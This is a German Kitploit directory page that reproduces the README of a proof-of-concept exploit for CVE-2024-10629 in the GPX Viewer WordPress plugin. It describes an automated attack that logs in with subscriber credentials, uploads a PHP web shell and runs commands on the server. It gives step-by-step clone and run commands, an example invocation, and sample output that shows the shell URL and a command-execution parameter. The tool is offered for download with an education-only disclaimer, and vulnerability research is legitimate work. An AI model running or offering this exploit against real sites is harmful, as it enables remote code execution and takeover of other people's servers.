Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - Authentifiziert (Abonnent+) Beliebige Dateierstellung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-10629
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - Authentifiziert (Abonnent+) Beliebige Dateierstellung

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛠️ GPX Viewer Exploit (CVE-2024-10629)

Dieses Repository enthält einen Proof-of-Concept-Exploit für das GPX-Viewer-Plugin für WordPress, das anfällig für die Erstellung beliebiger Dateien (CVE-2024-10629) ist. Die Schwachstelle erlaubt authentifizierten Angreifern mit Subscriber-Zugriff und höher, beliebige Dateien auf dem Server der betroffenen Website zu erstellen, was möglicherweise zu Remote Code Execution führt.

📝 CVE-Details

  • CVE-ID: CVE-2024-10629
  • Veröffentlicht: 2024-11-13
  • Aktualisiert: 2024-11-13
  • Verwundbares Plugin: GPX Viewer <= 2.2.8
  • Schwachstellentyp: Authentifizierte (Subscriber+) Erstellung beliebiger Dateien
  • Bewertung: 8.8 HOCH
  • Schweregrad: HOCH
  • Version: 3.1
  • Vektor-String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Beschreibung

Das GPX-Viewer-Plugin für WordPress ist anfällig für die Erstellung beliebiger Dateien, da eine fehlende Berechtigungsprüfung und Dateityp-Validierung in der Funktion gpxv_file_upload() in allen Versionen bis einschließlich 2.2.8 vorliegt. Dadurch können authentifizierte Angreifer mit Subscriber-Zugriff und höher beliebige Dateien auf dem Server der betroffenen Website erstellen, was Remote Code Execution ermöglichen kann.

🚀 Funktionen

  • Automatische Anmeldung mit angegebenem Benutzernamen und Passwort.
  • Prüfung der Version des GPX-Viewer-Plugins.
  • Lädt eine PHP-Shell auf den Server hoch.
  • Überprüft den erfolgreichen Upload der Shell.
  • Führt Befehle über die hochgeladene Shell auf dem Server aus.

📚 Verwendung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek

Ausführen des Exploits

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. Installieren Sie die erforderliche Bibliothek:

    root@kitploit:~
    pip install requests
    
  3. Führen Sie den Exploit aus:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    Ersetzen Sie <target_url>, <username> und <password> durch die entsprechenden Werte.

Beispiel

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

Ausgabe

  • Das Skript gibt die Plugin-Version aus und prüft, ob es verwundbar ist.
  • Anschließend meldet es sich mit den angegebenen Anmeldedaten an und versucht, die Shell hochzuladen.
  • Bei Erfolg überprüft es den Shell-Upload und führt einen Beispielbefehl (ls) aus.
root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

Beispielbefehle

  • ls = Dateien anzeigen
  • uname -a = Systeminformationen anzeigen

⚠️ Haftungsausschluss

Dieser Exploit ist ausschließlich für Bildungszwecke und autorisierte Tests gedacht. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal und unethisch. Die Autoren und Mitwirkenden dieses Repositorys sind nicht für Missbrauch oder Schäden verantwortlich, die durch diesen Exploit verursacht werden.


Von: Khaled Alenazi (Nxploit)

Tool herunterladen